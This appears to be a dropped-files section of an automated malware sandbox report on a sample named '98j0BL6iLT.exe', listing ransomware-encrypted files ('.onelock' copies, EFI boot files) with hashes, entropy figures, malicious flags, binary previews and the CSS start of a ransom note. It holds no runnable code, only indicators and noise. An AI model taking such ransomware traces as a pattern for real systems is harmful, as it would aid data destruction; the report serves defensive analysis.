                                    Preview:>|.6......=........?3W..4.|\....`..,9.Y...F.J.bgK.c3.Fd.A.....}..............dj..~.'....W%.....e..F.@.^.&.|5}.p*..&.......VV.....:&.w._p.H..2.*Q..>....>.....Yj....lG... .6.c.l.Nj./.%IK|k4...hyR...).ie.h+......c.p.+,...7M.....p.w....&.$X...KG..>F...?.G..M..m.eQ..!...Pb.....l%.&>._.z.o..t.\.....mn...&.f;+`.>....U.....w...i.i.l....z............xY..{.R.....$..B[LLj.yo(..l..'N9..l....n...a...(.>......0.A..w.y..m....9.V....fi.V....~,w^.-P,w5tK.K......s..vp...F.M.!.......>#....Fd.:.K.Xs.A.xwV-.A..i..?-.vd.;.:O.....r.(C'.v@.7p..s9.'.0.AO.x8..p*.....%.!~$..W..%.....A.....>....p...a@].`:..].........*-...~.Vt../~..s...#...v.sd......*FwB......f./...{.9.n.|..kR].'..oW.). ......BQ.d.x....g2DG..9.G7.D.9|..:..:......WCT.....N..$..........mh..e.{.W.b..C...\!.`.$....z=.@........}!..Mt.d....`'.W....Y.._..cvZh.[..@.F..E!.0E........O.e..a.D.u.].8..).Q...^AwK.........|>..l....sv..@V.%xs0....o$...|'...y.B..9).......S.h,x.<..C9s.|.*......... .{...@.?..bO.......By

                                    C:\Documents and Settings\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2794008
                                    Entropy (8bit):7.999941320269777
                                    Encrypted:true
                                    SSDEEP:49152:0UXvW84nwFeuZ8H14fVLwhBW2XlIRX0DCrt6Xu1uziA5XuQZeLLHkHY8:Tv1Fen4f2B9kXtOPuA0QZM/8
                                    MD5:AC659E4C7691EDE84A6467A87EFAA20B
                                    SHA1:16A86243CF9C1D89243FE7C492039D433BDC8BE3
                                    SHA-256:96523C790EF43C8016D2EC904A2D739176B64B4D557ECE51C4846AA52E54FB3E
                                    SHA-512:E9B52756F8C82FF715813168D6465D217EDAF47B870081235646A0CB855DBAA4C8F1E95D05002EEA32B32C78FFDC227E53C77F741FA71A1433A7B53511FC5DB9
                                    Malicious:true
                                    Preview:>|.6......=.......V....W..\{..]......r.....3Y..]..j.|...@0&.....*1..F.n5wLP.gc...F.'YO.J,.A..t.n..Nbt...Mb.3..i.....}.k....)..`~h).....4`jh...?P7K.0..-........L......"'D...Ux..Z.A.T@.;.6...@|@.Yq9Y.{.C......^....w...j...;^...WV{..t.;.V.~...L4..W....$.isSu....."..\.M.F.+.}...@.i<N......./.C..1......[.!m..{.......N...l."....L..u.LJ.X#.hdb,.Ko.V.n..CVj...`.~...3j:.R..uAXE.....L.`......>0....8..V2#.k.F.rV..M.ax.Y.Z..Dm}..>....o.ia0..G..68..\....-T......1x.....z{H.7..x..x.$.Q1B.u..P..b.K."...M.....CX....iFH....K.$u..}I...?.OZ.N..rM..n5.E...R.!.a=:..p.....ub...0"r@..!2....]......@..xBv..ue.Lj_*}.*:....n(..F..q..-. .;..........M&.OJ..H........%..`.,..g....&....O....9.....c.. ..H.......L.@.).1%.K...zV./t.|..7.E.L.[.B)Giz.....U...-.:...|].}.9...EB.....V'..2....I.w..s9..$;.X.h......$.A.zi...A.....&(h..-D...m..8KN.o;.c..2'...{L....s;Lg`....i..._t..Px-X]......_j..&.b..m.&.iQ.O" 7.L..Q..\.....y..7...B.`./.N..|e....t.XV.%.v..XX.....cs%a*;..R.... ....n..o

                                    C:\Documents and Settings\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab.onelock (copy)

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):175114579
                                    Entropy (8bit):6.997748181847772
                                    Encrypted:false
                                    SSDEEP:3145728:FQN6HdDdl9HCH6eRwZ+zU5IZ+zix/5bg5ha:A6XXHCHJeZ+zU5IZ+zix/G5ha
                                    MD5:811E47ECC528DF476FAFAEA27C7AFCAE
                                    SHA1:4B4E001D2F6E22F82CE1E8543DCAFB6B3B7499DB
                                    SHA-256:04A0C34707FC04A15F8AC4FF8AB6121BADD6B8F51F20A3FAB504D48BF3B9A3AD
                                    SHA-512:AA8D82F2B478843EBAB4B7EC46DE1D093E6B8FF4929E51D9B3F927CDE00CFCF6BC4A4E09F2F5A35D39A093A19288AA03D8B2D71B3275DCA952A7677D0E2E0D65
                                    Malicious:false
                                    Preview:"..S2.l,@.....(.*..o...sA.....r...\.{....h.{.,.h.6.6....B.r..S.d...V.j.&....;..*....I..Ry.&........C..7% .g.|.....;....tQ.^..k`.E.`-....3U.usj..5..l..../...Z^l!.2@u8~..A(o.$-.Of......S.W9,....7x.].....S..*.2...=..x..f.....HDJ...e....!.BM9.+.e.tUK.<.[.........L.U4..........~.Z../).bY..f.j..[..........4+,...x7..Y.ZF..u..+........Y.`:-..}...^..u..W~q~9<Ek.s..n...e`..4.+.xK..........:>..G>..z.u.o.4L.....Y!.%../..Pn.$.n..$}&kA...>...Q....Z>.XN.]jn.&>..,..)....r....r.0_...=..1$..FA..AEL...T.....@..-O.5.*.z..O&..,:f[.....L9q.....<.;...#....Th.|..q.i.~;...._|,H..B.E..........Mg.9...@n..~+..3.....3.".^v.t.l....d?..k).I+.i.!.>...g...M..+i.-W...vwde..K....Cu-Y.hq....5kb.....S...`.._...E.|<7....=Ti.....k...;K.Q........_.2.....;.'......J......8_>.y^.R-..y#.(........C....W...P......}.M..n.!....4.6Na.b#.eF,.Q2..p...v....Y.....V.X..0......v..Iz...K.E:}..T,.X}.9..!}.....`.c....U.QB.z.y.......~...5.....Yi..........q......@..6G...<.J..s5/bC..*ne.

                                    C:\EFI\Microsoft\Boot\bg-BG\bootmgfw.efi.mui

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997304266790072
                                    Encrypted:true
                                    SSDEEP:1536:HUs6ajGMGAa6rc5o/cwnUcsExYas9/XdP20E8y6utVpqLWW4TmHn:96Ervoo/T2/deL8y6CVU0SH
                                    MD5:23BCDF6B4CDD5B88C4901AB8DE79062E
                                    SHA1:E2241BBDAE4DD15CA1170DD9AD5876A84B56FF93
                                    SHA-256:9B82C0FE441CA4BA4C36F5500E02D1E82F27426E31EE01F9A204C8A2FC7424AB
                                    SHA-512:18C02DEA53372678ACFA64141833F14F3B60B76E98A066C75D45953F873F38B1465D1BF12242E5D15C5860D3040DBFE0E3CE2CB7D8FDA5542ED6A1C92660E33B
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..%..o...s."I..r..{X3?L'....?g.......4....I1...s.?z.t.s.=..].....}....(.}...gE\.n...?{8.t.0. F.^....V9nn.....(..Y?.a.......;*..zs.;...i9.WD..AB7...../@+.q%4;K.|..}T.V.)C........=...k.`}%K.....).2U+..`IzZ#.....QlR...n5.....7.)...L.m.FZ..L..5N".d...a.!P....D...\5.EK+.E..yqu>......T...Nr.\...Pg....K.P...z...g. ....=....{].JV.%.......=n-....-rn...hl....../x..8..GV..fH..L..W.....+.O.?.8...]T.y..h,.hl.m@@..........$..L`Vw.k.c..... 2.y.S1...2..l1a....]M..W......3.'%L_...%&xP.ee.b...=..,...y3.....[..J.].2.*.#.NdVF.......G4.)......X..rv....-.;...u......'..W2..|...#. .`B..'$.H.K..e.=..1."Q.t.<x...l..F.T".x..XC...9........x(........tY..:..kB...w.u.....$....h...Ut.."r.DI.b..d{.........~D.;.@."...q.E!.....?....!^."a...H{..^VM....{...h...uT.

                                    C:\EFI\Microsoft\Boot\bg-BG\bootmgr.efi.mui

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997542530776212
                                    Encrypted:true
                                    SSDEEP:1536:czvVZCD1l9HfhMTfs95ggBaokDmPR8L7Nt579UX0ZNoBunnFzeFVX7:czvVZCxlxfhwfs95fYseJ+kZW0FCFF
                                    MD5:911DD3F933998EA4F97043CF39CF8966
                                    SHA1:89A99BEAB6C5318A814A98DC999B7B0DFFD04DE0
                                    SHA-256:AEC0628A94A3FAB5E8A5D7325D49444878894B8E038FCF71F47A15F2242904F6
                                    SHA-512:44F65B339361605624EC37BCFAF184C7375EC9653700B876981B40A5DD0124767D80F6E642C54F931EA39CB8AA5775B8A5DBBB205ABA7ACE663E08C0AD8705D8
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..%..o...s."I..r..{X3?L'....?g.......4....I1...s...B.k.9...D&....U.}<../=.......6.8cc8W......"..Aj.c...m...W..v8.:.......q..c..................'..)s..}....^].M.)C..M....Ywlw....M..rP.R.W.7.7L.&.i.I.....].~x.....B.........K..I.]..4..".a.O.D.L..pZ..%.P..$R..?0....*."...E...)-/.%....j.,.j....3.1aM.&......b..Q..L0o].b..I.g.q........x._.pt.Tg[.Q..w..a...>../`....dt...O......3.e.H.{&.=.o.C.)..!...........r....B.,....%.^....%v....l...(.......4.hkpt[..R....|rO...U.3.S*..F...g..5.X....o..5..........ir.G.......",.J{.U)........pp...Lhr}+.M.f.?K.u.B.pO....T.r..).....1..w.4.4.#b ...w..S.G...p;.O8.d494$..vD.x....Z.....J.7..h?....HF... .....O.}z-.....&...s.6.G-R..|...u...G...W....()N.. ...]T.NW@.1.ipI.F..{..8...V....}.'..*.......*i!.n.l.y.U.}...~.f.9.

                                    C:\EFI\Microsoft\Boot\bg-BG\how_to_back_files.html

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height

                                    C:\EFI\Microsoft\Boot\boot.stl

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8728
                                    Entropy (8bit):7.977106146342546
                                    Encrypted:false
                                    SSDEEP:192:ZPC3UwcaIkiZ88aM8fPjwm/ntHVilFpwVaGMBWmkvnQluNJn2Cq3nzUCdw:mkZ88aLbHtH0lFpV0m8mOJqztdw
                                    MD5:15A7E4840964F45D697AA42825282A64
                                    SHA1:8B025EBAAB1CE204C05C07ECED045BAC33504AD7
                                    SHA-256:0F7767FC96133CDDE48642E650955242C1DAADEE1548F4E14CBB03609F36D1B6
                                    SHA-512:543A8C0B23E745C60F612F545CAFA2354ACA2DCB728192728D163880762BE6ECD2CD0093E2F0E9A6FE4FF05B160D65F56471D0DA6D5CD64E16C0525B3E8C73A0
                                    Malicious:false
                                    Preview:.B..^(..[....h..A|.....(Y.15...$.#...N._..T.F..#j.C.......U.]q.......`,......"O7.Y......+*V.Sf....e..z....... iN.v.....;f...|,.NTw+......D.O.Z...vT.hc..0..*d0..=..{.GR'El...V...Z....).l&...A.....Q......sx....dX...3|`..@..x./..../.$-9f<...m..P.4...m1....e..ws.tq.Ji.1..=..z.....&.%\..........i...A._.........o/.Q.p...Kk...=Z...IF..`..~#...f..B.......i..M.d.}...a....y..3...tw/O.a.Z.:d.m.Qm.\.E..>)y..>V.@..oH7....bna<..E.Jf.ZJcl..d...W......P:.$....Xa.....?...@..Zq....?.q..#\d......H"c.Y.u<.8.......F?7.e.(..qc..k.m.:...P..#.......l.1.........9|L....4.+......a#...l...+....o..R..Y.zh.y&....<a..f.RT....-ku..t.A.i..*.&&:...rN..G.e.......s.'{.s....!....TQn.Q0....7..}.i....)$...R.G...H/ ..*O].B..'xS.3?b........h{....3.Y..(.i...h.Iuq...v..&....&.]..YL{..R x.c.T.[.SMlM&.v?....Q.b.y.:..`..'...A...Q...L..p_..O...q9...t.........8./v.......;.dS...&n....9SG.so.M....m.:..12..y..g..T...]%m@2).u..eV.....Z...........4G.T$C....x..0.v.5.y.&....,.,..w..V..%.

                                    C:\EFI\Microsoft\Boot\bootmgfw.efi

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1278488
                                    Entropy (8bit):7.999835151084896
                                    Encrypted:true
                                    SSDEEP:24576:oBHiRycWCahcWeCoejQVuvvclYSzfZHLtekIcTmIJrEZAo5W1RmjXf:oB8ahcWeCXjklVZHLo6EZAo5X
                                    MD5:6A8808C992ED1D6DA1EAF2CD32DB90EE
                                    SHA1:9C3A2603239AC9DA9AAB158D72A7DB895E0E05EF
                                    SHA-256:01203FDC2B66A058AFBB18349326AFCFFD2CF93976433B367383939B4145F62C
                                    SHA-512:7DBD38C02750EBEFACDE396E91C3E01794E8F750C8B7253720990D731172706A02F192E2BFEABAEA80FBBBD73AF17369C1896B8902302155E8634F3B8E3ABC69
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|...L..a-!M.1.....|..W%_X..~..f.I..J{I....7^.f.pmH.HG....?..v._...VP:.......U...eO.kX....&...D:)8x...m..K}B..H<+...J....^.k..A..Z&.5".....'.......c..vx).D})..Wx.@... ....ZYr=...^..*.c..H.<...0../..=.t..d....^.......V..t..Aa...Y..?B.6.....I.....a./3iv....D..<W.....Y)U.....!.D.!..@...\ZGt..x.u.V4..v...b..p.. *.O.Dt;u#.G.C.......S..Q..Ai.=..m....n......n..^..c4.....o4<.v...I.....b...S.b.!UF.."*.D.ap.z5Y3_...)mq.h.)'...s.J...^.[=..W..6../r.[..Na.$P......'~...dh..`..Z!...g..{.$..!....O..o...$p.....@.........h).v........n..T.........-X.M.....F_..*..Nt..[...+(4..U7.F..RL.~....2ND3.}}cH:.X,;5...A> .1..E...Q..H..).+...]...T.P.....To.G..<.f..|...z..b.{...q.N.i.KN...#........pV............[>i....!...Zh./....sG"s...d......5.U8.4.5h8...2.b.0..e/G.YJy.....9...@.....`.6.....|.<...R.*..j.=...}`\..P.+...u..*9..`-^.+....+[.. .*.(..:S......(.^.6..h...F..$..)..t...`.......4.).r..>'..4.....I&..=.F..*...6.s.

                                    C:\EFI\Microsoft\Boot\bootmgr.efi

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1262104
                                    Entropy (8bit):7.99984657105943
                                    Encrypted:true
                                    SSDEEP:24576:Rgr7Kh/L4XEol22Ts7ybnHP2Y6Ry8gg2zhVHhMhYq+ZxLOjCq5q1/Y9V6JjYZGtc:yielXsenHPKY8gdzDHogLOjz5q1/YTeQ
                                    MD5:D600D0E6068CC05EFD4FA88558C49893
                                    SHA1:1DF94612451C1DA566EFA574F53B859E7B3F23C2
                                    SHA-256:7DD67B417A016B74EA67866CC8848EDB21F2867756FC701A1666D450953C680D
                                    SHA-512:E3C71BE14FF2975610EA3F6D9D0E56F057B109F039B677985703552BD61ECA6629D17BD4526798BF805BDDEA52200449A1837C0F4519402492F04902DB6BBD3B
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|.....@....`&....Od.q..Q*b..<.n....0s..$.N.K.5I*%..........j.....4~.>IQ.{1Q..Acr.rp........<l..X...A)i7..F!~.Y..@..&.s.X.^|.6.......G.g-...;.q..-..*..Z.<...a...3.&1.V.....s...Q....u...U@..T..^....k..?e....|F2.Cq.8...Mz.)..2. .....6u:.f..........8...PQ...... ...4Y.`..O.2.j."....{{/T0..1?..+U.f...k.....o..H.F.*61k~.e-#I....C3?|x.............9QR`E.#.q.H..?....m.u.]K....=4.M.....:-.[Lh.N..0!....=...X..G.|..J.. .[....=.....oa.....,V..N?&....z..t......`.#..E.&.D@..~...d...q>.k.K...w.*.......m_......A.|..'....".........a/.L.,..'..5.4..b. ..-.O.L.W.......e...yW3Y.Hy6..>..U?.. .......^..-.|s,./u(..>.F...:.^....d.Z....E ..4.......aFp.5J...*`..|.....\4...& ./*..X...,.J.Q.Le....1...(.%.3Vt...T.=/*x..*S!=.....Px..R.S..q...o.......3....L.r......3..)r/.2.u..w@Zq..L......A..dN..=..A....G...e.:>......K+4P..?....>...Jo.9.c..5...jm.+........;U,Q.p....A,.4...\.(...w.X....R.r.]..2.$Uv..F;e.)?p.T..f.?.t&Z....dX9./..e.v.

                                    C:\EFI\Microsoft\Boot\cs-CZ\bootmgfw.efi.mui

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997876790440874
                                    Encrypted:true
                                    SSDEEP:1536:TaxeNIkB894zcCi32na49orAsjxLqDXgVNECuI0WgS8BQKV:00cBmnCrAcLqDwVNPv0y6
                                    MD5:6505327C72B7D67BF353BC92DCB6E57C
                                    SHA1:C52BD09E2CC6B3FFFCC5AFC8224204429677B4D1
                                    SHA-256:327C38636B3F2AA1239AB4E8FB6687C91A37C7E8C915CADC2EA1D91AFF1B0AC4
                                    SHA-512:4B59FF73CF9A998BE5F0B74FDDDB94E0F6524A1354150EC130677955B39064CD9ABA121499171C095CF09657FCBD5ACEF85DBC1DBAEDC0EFA6E7B0861E629F93
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.....upz.6(dL..I$XS.6.3G{`%.Z.....g.&.g.\.@.0b.3......j.....LSz.`..^5.8....;.)...N.}R.V.wz!m@....K.......X`..i...8s<}....$.a..+..RS.XA..\.3..w...;_"v ..$.P_...>v..H....~<...x...y\s.O*..^i=....j...c.F.S.....UIX7.@.BP+..9^......~.&.R..m..p_.3)...W7rZ.[....W .2&...G..(V?>.q.sT.P.zkH>....5...t...Pd...T.6*....}..W...3. ..8..... .....>.p?.djU[......4l..rS.WQI..u1.?....X.]]..8.x`8..Z.-.G. g.'.._L.....>. 9.j..\l...l.w..$.7.....TtQ.`.v.%..m..M........."5..Q..c..h.%...p.|...."._.Z.!|*.UD7..U.........Go..d...y.ZJ%._.....(.....-n.NN......!...E...uF..T.@....qy.f}6.F.kw...q...5$BYIyFZ.1WyA..Ju[.........,s.l...=.Q%.:.W,...$Ls'l`S.P....Q..V.s.?.[...=f.i.rl...."..T.T.`.;...C.*.Q.A.s.XrF..<..Sg6g..s..6...0.o.'.w.iP.\W.YZ..-.:CN...;........r...

                                    C:\EFI\Microsoft\Boot\cs-CZ\bootmgr.efi.mui

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.9975219340305745
                                    Encrypted:true
                                    SSDEEP:1536:R85+oXQU4OvhaM4pFyRSAXbqWmvJApc59qpNskdt46JHTyw8i0bnuqvdueNTUBHW:Sx3aSRSzWmvqpGApZt46JHTZfEdvkH+n
                                    MD5:9A5933D536D7725F5130CE760B1EA4E7
                                    SHA1:82B2CF4AE8E317CBE27146C5E4CFD7A34D01D7D5
                                    SHA-256:FC882D55F343900197BF9179B82864BD0A4C5F44B58780340BE72E48D80C828F
                                    SHA-512:36AB179FE39F7D7DD1790F175ECF78A49F4C78EACC2B8E86D813C6A21A79B90F7C9F9C7E5CE2F1A053E02628D61468E35B21D4EEA9EA967009E194D5E2D791FD
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.....upz.6(dL..I$XS.6.3G{`%.Z.....g.&.g.\.@.0b...H..K....N./.....~..C..Ho@.j+.A....p.Kd...p..^...<y.....}.p..<W..f7..k]P.Ap<..di...7..1..[........F...H....f..c..q@Xw....).*....n...Y.,..BH\..4..h.}....s....@7.?...91as.g.@..e.o@..Dd..D...6#./a.\]3....,...#n}.OUW......79cy2?..of.....x.[5N.....zP".LS..G....k......VCrT.N.0.......}he.T"_......adPd..T......eLH..x.c.(.....<.HU......5/8...&..%`.o...G.H..I..J..e......K...^.7~8..!~.9(.;.|:....{.M..-...q0.S....q....{m.=..u...vT.N*.gs. [...!..#...x}.u.K.S.o..!^.1..... u......^...._m.....6..._..`0&.[F.<D4...dK..d+A.h........5..8l.%4..-j.N;`.ji.}.h.o..ac.v'c.TX[D#.j.S`jsO....U0..,........."~.....${K..R.....&f...z.........#la.%.f..RI!r.g...s..!_...].0...q...?.m.....C[.;...c..r!...r....Y,{'

                                    C:\EFI\Microsoft\Boot\cs-CZ\how_to_back_files.html

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:96:8y+cAl5azrn+DtZoglItUMF6B+VSZiKFe8LDmeRj+:8OAl0zaDjqtUBKS0KYQDmJ
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height

                                    C:\EFI\Microsoft\Boot\cs-CZ\memtest.efi.mui

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):49688
                                    Entropy (8bit):7.996397772671244
                                    Encrypted:true
                                    SSDEEP:768:7VqH+FMMWQqmTaQDq2IbxP2SsH941D7+pe7pPCKoEsUHgR1oCkLwATxsJAl8jQ:7VqxIVq2QPPKpeFtbgVkEsxsJvQ
                                    MD5:496851E723A776AF94BC98563BD346FB
                                    SHA1:BD61BE1C792DDBA609E7FCDE614B4FB1EDB286C7
                                    SHA-256:39842674385EB5B6951B1AB5A08FDD965F9AF2FE6EC2F6733925C03F362DE8FA
                                    SHA-512:E8ED84689C0256621CF570BDFD7CBE38C0B67FF88C4309703D2627FB1FB30D5AA12CF27E390E29166D1D1B85EE892DE007371DFF127D6B2086782735F7B18F72
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..{.z.qz5......:,.|fN..6..jE........Gq...<.?3#..2..].G...|.6.Q;:J....Cv.?.......N..X.8.......OAn..K.+j....(`.O..P....U.!........}...=....q.q....P..}...I.i.!.....*I.K.e...`J...T?.4...s..B. ..N...Z1....._.A..Z...S..6T.....f.~......9..D..K..Z}&...Q~S6..F-.ox._.o.L:.|.....=.....oj...........g.y%...k.G..6)jz..0.g.Y.P...19E.}.. <HD.!-...2:....s.o..%k."R.=ZIa..6......nx..G.U=i.. ..f.P...sc.....?.r.<...@.z*.....Ey&91.RV.`-......[.V..O.'............J....q74z\...df.l2Q6f2.Q...0.=..$.c.].1..\Y.......xF..0.9..-.x.,7I.|.!S....P.5Z...O..@%..|.._.B~..*...o...C....:.JE'V......f.{.'6.U[&....4...s.+..H..#..}.s.:..u....(.....G...T.O|d^...#.-Y%.%,.}N2..k.K...gX..f..9.....&...Nl?..\A.TsV.4.zT...{9....J...0.....a7..I....h...1..7.o..X.4.t...Vp..E..

                                    C:\EFI\Microsoft\Boot\da-DK\bootmgfw.efi.mui

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997912558646714
                                    Encrypted:true
                                    SSDEEP:1536:oUnw2IH85OpnNeT6Mhi5FxHvrjLd60Lc/mR4cGf3Eh1zrwL76GJ4eZW9WEq8fvp:oUn08MpNs6MM7VP531q/SF1XM2
                                    MD5:6CB96AF1730E254EDC4AADFD02A3A624
                                    SHA1:DB5A4121C4C0265693F5D52DF141A4AA468462B6
                                    SHA-256:E7DF15F2809F3165DF9590922E29AA94F2F655F63D3B2330D894675C45F40E32
                                    SHA-512:441C335E53AF653F9F4EF36FBB5005387317FC08A408342CB8F5DB8F8959B0C5997FA691EA9FAF86FD4FC981BAD5514DB6453E5F7B285F990395A91FE4CED517
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v.......gL.h..".e..&G7..I.q..*^S.....9...z....I.u..G...e.........4..0.... .hBv...v.q....`..,V.........o\. w..{.N.._.L...$26..L.Qy.1+{.......Y..r:..t..&.a.O#..<U.B.|G5.*....w.+.R...T.1CT....M.......`.4....z.dg.......2....G.G4._Z.@......Y....3e.b......$nergpe.".!..q..=t...mV.....r.....22..,n5.r M.,\`.M..)..\.I.. ....el.+.].3!~.....$.e4 12D.g.[......q..4F.&P..b.[..Z..D].#.N..x..........sL....[...U.T(.....u...2.m..^.Y%.A...S......~o.J~.>.L....O-....@..\u;. .b.......9X....VKO.E"+;..-.B.....K[Qsd..w..*...XD.H<....+..X..s,G....H.....3.%.d{..~..t....hR.t...e.dM..........R..-..L..O..Ft.)gK......l.h.A......%.+.......u..%.. .u't........~OvZ%....j9E.#.....U.!...A<....I+.>g..83...b..mY.6.M."...yIsD,@..wgq1.qX..p.V<.X....k.Q{........

                                    C:\EFI\Microsoft\Boot\da-DK\bootmgr.efi.mui

                                    Download File
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997696431355067
                                    Encrypted:true
                                    SSDEEP:1536:PIzKGIUnYfrW/3UDTR/GALyY0L3WszfUeZfTgrNwFix84RZ2on22:PGfIjHT1GALOWszfUe5Acq8qRn22
                                    MD5:79D752710950DD9ED891028EEE5CBEEA
                                    SHA1:8D3EFAEFC80436E05C75E50183797E7CD415A403
